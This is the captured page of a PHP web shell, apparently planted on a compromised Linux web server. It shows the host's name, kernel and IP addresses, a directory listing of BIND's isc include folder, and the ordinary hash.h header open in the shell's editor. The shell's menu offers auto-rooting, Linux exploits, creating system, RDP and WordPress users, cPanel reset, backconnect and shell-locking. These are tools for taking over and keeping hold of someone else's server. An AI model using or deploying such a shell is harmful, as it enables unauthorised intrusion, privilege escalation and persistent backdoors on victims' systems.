Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.15.142.42
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
bind9 /
isc /
[ HOME SHELL ]
Name
Size
Permission
Action
aes.h
1.05
KB
-rw-r--r--
app.h
10.23
KB
-rw-r--r--
assertions.h
2.78
KB
-rw-r--r--
atomic.h
4.15
KB
-rw-r--r--
backtrace.h
3.8
KB
-rw-r--r--
base32.h
3.94
KB
-rw-r--r--
base64.h
2.39
KB
-rw-r--r--
bind9.h
849
B
-rw-r--r--
boolean.h
746
B
-rw-r--r--
buffer.h
25.69
KB
-rw-r--r--
bufferlist.h
1.42
KB
-rw-r--r--
commandline.h
1.69
KB
-rw-r--r--
condition.h
1.44
KB
-rw-r--r--
counter.h
1.88
KB
-rw-r--r--
crc64.h
986
B
-rw-r--r--
deprecated.h
622
B
-rw-r--r--
dir.h
1.96
KB
-rw-r--r--
entropy.h
8.76
KB
-rw-r--r--
errno.h
658
B
-rw-r--r--
errno2result.h
893
B
-rw-r--r--
error.h
1.4
KB
-rw-r--r--
event.h
2.98
KB
-rw-r--r--
eventclass.h
1.35
KB
-rw-r--r--
file.h
11.43
KB
-rw-r--r--
formatcheck.h
892
B
-rw-r--r--
fsaccess.h
7.25
KB
-rw-r--r--
hash.h
7.52
KB
-rw-r--r--
heap.h
5.14
KB
-rw-r--r--
hex.h
2.33
KB
-rw-r--r--
hmacmd5.h
1.75
KB
-rw-r--r--
hmacsha.h
4.44
KB
-rw-r--r--
ht.h
4.29
KB
-rw-r--r--
httpd.h
2.26
KB
-rw-r--r--
int.h
1.37
KB
-rw-r--r--
interfaceiter.h
3.03
KB
-rw-r--r--
iterated_hash.h
1.02
KB
-rw-r--r--
json.h
1.42
KB
-rw-r--r--
keyboard.h
976
B
-rw-r--r--
lang.h
636
B
-rw-r--r--
lex.h
9.42
KB
-rw-r--r--
lfsr.h
2.88
KB
-rw-r--r--
lib.h
1.04
KB
-rw-r--r--
likely.h
718
B
-rw-r--r--
list.h
5.65
KB
-rw-r--r--
log.h
28.06
KB
-rw-r--r--
magic.h
993
B
-rw-r--r--
md5.h
2.34
KB
-rw-r--r--
mem.h
20.63
KB
-rw-r--r--
meminfo.h
690
B
-rw-r--r--
msgcat.h
2.66
KB
-rw-r--r--
msgs.h
8.22
KB
-rw-r--r--
mutex.h
3.44
KB
-rw-r--r--
mutexblock.h
1.34
KB
-rw-r--r--
net.h
10.32
KB
-rw-r--r--
netaddr.h
4.56
KB
-rw-r--r--
netdb.h
862
B
-rw-r--r--
netscope.h
947
B
-rw-r--r--
offset.h
699
B
-rw-r--r--
once.h
981
B
-rw-r--r--
ondestroy.h
2.79
KB
-rw-r--r--
os.h
670
B
-rw-r--r--
parseint.h
1.49
KB
-rw-r--r--
platform.h
9.31
KB
-rw-r--r--
pool.h
3.42
KB
-rw-r--r--
portset.h
3.21
KB
-rw-r--r--
print.h
2.49
KB
-rw-r--r--
queue.h
4.66
KB
-rw-r--r--
quota.h
2.29
KB
-rw-r--r--
radix.h
6.37
KB
-rw-r--r--
random.h
2.99
KB
-rw-r--r--
ratelimiter.h
3.38
KB
-rw-r--r--
refcount.h
7.89
KB
-rw-r--r--
regex.h
766
B
-rw-r--r--
region.h
1.99
KB
-rw-r--r--
resource.h
2.8
KB
-rw-r--r--
result.h
4.62
KB
-rw-r--r--
resultclass.h
1.56
KB
-rw-r--r--
rwlock.h
3.6
KB
-rw-r--r--
safe.h
1.21
KB
-rw-r--r--
serial.h
1.4
KB
-rw-r--r--
sha1.h
1.52
KB
-rw-r--r--
sha2.h
5.65
KB
-rw-r--r--
sockaddr.h
6
KB
-rw-r--r--
socket.h
35.81
KB
-rw-r--r--
stat.h
805
B
-rw-r--r--
stats.h
3.02
KB
-rw-r--r--
stdio.h
1.74
KB
-rw-r--r--
stdlib.h
703
B
-rw-r--r--
stdtime.h
1.3
KB
-rw-r--r--
strerror.h
776
B
-rw-r--r--
string.h
5.94
KB
-rw-r--r--
symtab.h
4.21
KB
-rw-r--r--
syslog.h
843
B
-rw-r--r--
task.h
21.08
KB
-rw-r--r--
taskpool.h
3.61
KB
-rw-r--r--
thread.h
1.47
KB
-rw-r--r--
time.h
8.66
KB
-rw-r--r--
timer.h
10.54
KB
-rw-r--r--
tm.h
894
B
-rw-r--r--
types.h
5.54
KB
-rw-r--r--
util.h
7.49
KB
-rw-r--r--
version.h
688
B
-rw-r--r--
xml.h
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hash.h
/* * Copyright (C) Internet Systems Consortium, Inc. ("ISC") * * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. * * See the COPYRIGHT file distributed with this work for additional * information regarding copyright ownership. */ #ifndef ISC_HASH_H #define ISC_HASH_H 1 #include <isc/deprecated.h> #include <isc/types.h> /***** ***** Module Info *****/ /*! \file isc/hash.h * * \brief The hash API * provides an unpredictable hash value for variable length data. * A hash object contains a random vector (which is hidden from clients * of this API) to make the actual hash value unpredictable. * * The algorithm used in the API guarantees the probability of hash * collision; in the current implementation, as long as the values stored * in the random vector are unpredictable, the probability of hash * collision between arbitrary two different values is at most 1/2^16. * * Although the API is generic about the hash keys, it mainly expects * DNS names (and sometimes IPv4/v6 addresses) as inputs. It has an * upper limit of the input length, and may run slow to calculate the * hash values for large inputs. * * This API is designed to be general so that it can provide multiple * different hash contexts that have different random vectors. However, * it should be typical to have a single context for an entire system. * To support such cases, the API also provides a single-context mode. * * \li MP: * The hash object is almost read-only. Once the internal random vector * is initialized, no write operation will occur, and there will be no * need to lock the object to calculate actual hash values. * * \li Reliability: * In some cases this module uses low-level data copy to initialize the * random vector. Errors in this part are likely to crash the server or * corrupt memory. * * \li Resources: * A buffer, used as a random vector for calculating hash values. * * \li Security: * This module intends to provide unpredictable hash values in * adversarial environments in order to avoid denial of service attacks * to hash buckets. * Its unpredictability relies on the quality of entropy to build the * random vector. * * \li Standards: * None. */ /*** *** Imports ***/ #include <isc/types.h> /*** *** Functions ***/ ISC_LANG_BEGINDECLS LIBISC_EXTERNAL_DATA extern isc_hash_t *isc_hashctx; isc_result_t isc_hash_ctxcreate(isc_mem_t *mctx, isc_entropy_t *entropy, size_t limit, isc_hash_t **hctx); isc_result_t isc_hash_create(isc_mem_t *mctx, isc_entropy_t *entropy, size_t limit); /*!< * \brief Create a new hash object. * * isc_hash_ctxcreate() creates a different object. * * isc_hash_create() creates a module-internal object to support the * single-context mode. It should be called only once. * * 'entropy' must be NULL or a valid entropy object. If 'entropy' is NULL, * pseudo random values will be used to build the random vector, which may * weaken security. * * 'limit' specifies the maximum number of hash keys. If it is too large, * these functions may fail. */ void isc_hash_ctxattach(isc_hash_t *hctx, isc_hash_t **hctxp) ISC_DEPRECATED; /*!< * \brief Attach to a hash object. * * This function is only necessary for the multiple-context mode. */ void isc_hash_ctxdetach(isc_hash_t **hctxp) ISC_DEPRECATED; /*!< * \brief Detach from a hash object. * * This function is for the multiple-context mode, and takes a valid * hash object as an argument. */ void isc_hash_destroy(void); /*!< * \brief This function is for the single-context mode, and is expected to be used * as a counterpart of isc_hash_create(). * * A valid module-internal hash object must have been created, and this * function should be called only once. */ /*@{*/ void isc_hash_ctxinit(isc_hash_t *hctx); void isc_hash_init(void); /*!< * \brief Initialize a hash object. * * It fills in the random vector with a proper * source of entropy, which is typically from the entropy object specified * at the creation. Thus, it is desirable to call these functions after * initializing the entropy object with some good entropy sources. * * These functions should be called before the first hash calculation. * * isc_hash_ctxinit() is for the multiple-context mode, and takes a valid hash * object as an argument. * * isc_hash_init() is for the single-context mode. A valid module-internal * hash object must have been created, and this function should be called only * once. */ /*@}*/ /*@{*/ unsigned int isc_hash_ctxcalc(isc_hash_t *hctx, const unsigned char *key, unsigned int keylen, isc_boolean_t case_sensitive) ISC_DEPRECATED; unsigned int isc_hash_calc(const unsigned char *key, unsigned int keylen, isc_boolean_t case_sensitive) ISC_DEPRECATED; /*!< * \brief Calculate a hash value. * * isc_hash_ctxinit() is for the multiple-context mode, and takes a valid hash * object as an argument. * * isc_hash_init() is for the single-context mode. A valid module-internal * hash object must have been created. * * 'key' is the hash key, which is a variable length buffer. * * 'keylen' specifies the key length, which must not be larger than the limit * specified for the corresponding hash object. * * 'case_sensitive' specifies whether the hash key should be treated as * case_sensitive values. It should typically be ISC_FALSE if the hash key * is a DNS name. */ /*@}*/ void isc__hash_setvec(const isc_uint16_t *vec) ISC_DEPRECATED; /*!< * \brief Set the contents of the random vector used in hashing. * * WARNING: This function is meant to be used only in testing code. It * must not be used anywhere in normally running code. * * The hash context must have been created beforehand, otherwise this * function is a nop. * * 'vec' is not documented here on purpose. You should know what you are * doing before using this function. */ const void * isc_hash_get_initializer(void); void isc_hash_set_initializer(const void *initializer); isc_uint32_t isc_hash_function(const void *data, size_t length, isc_boolean_t case_sensitive, const isc_uint32_t *previous_hashp); isc_uint32_t isc_hash_function_reverse(const void *data, size_t length, isc_boolean_t case_sensitive, const isc_uint32_t *previous_hashp); /*!< * \brief Calculate a hash over data. * * This hash function is useful for hashtables. The hash function is * opaque and not important to the caller. The returned hash values are * non-deterministic and will have different mapping every time a * process using this library is run, but will have uniform * distribution. * * isc_hash_function() calculates the hash from start to end over the * input data. isc_hash_function_reverse() calculates the hash from the * end to the start over the input data. The difference in order is * useful in incremental hashing; for example, a previously hashed * value for 'com' can be used as input when hashing 'example.com'. * * This is a new variant of isc_hash_calc() and will supercede * isc_hash_calc() eventually. * * 'data' is the data to be hashed. * * 'length' is the size of the data to be hashed. * * 'case_sensitive' specifies whether the hash key should be treated as * case_sensitive values. It should typically be ISC_FALSE if the hash key * is a DNS name. * * 'previous_hashp' is a pointer to a previous hash value returned by * this function. It can be used to perform incremental hashing. NULL * must be passed during first calls. */ ISC_LANG_ENDDECLS #endif /* ISC_HASH_H */
Close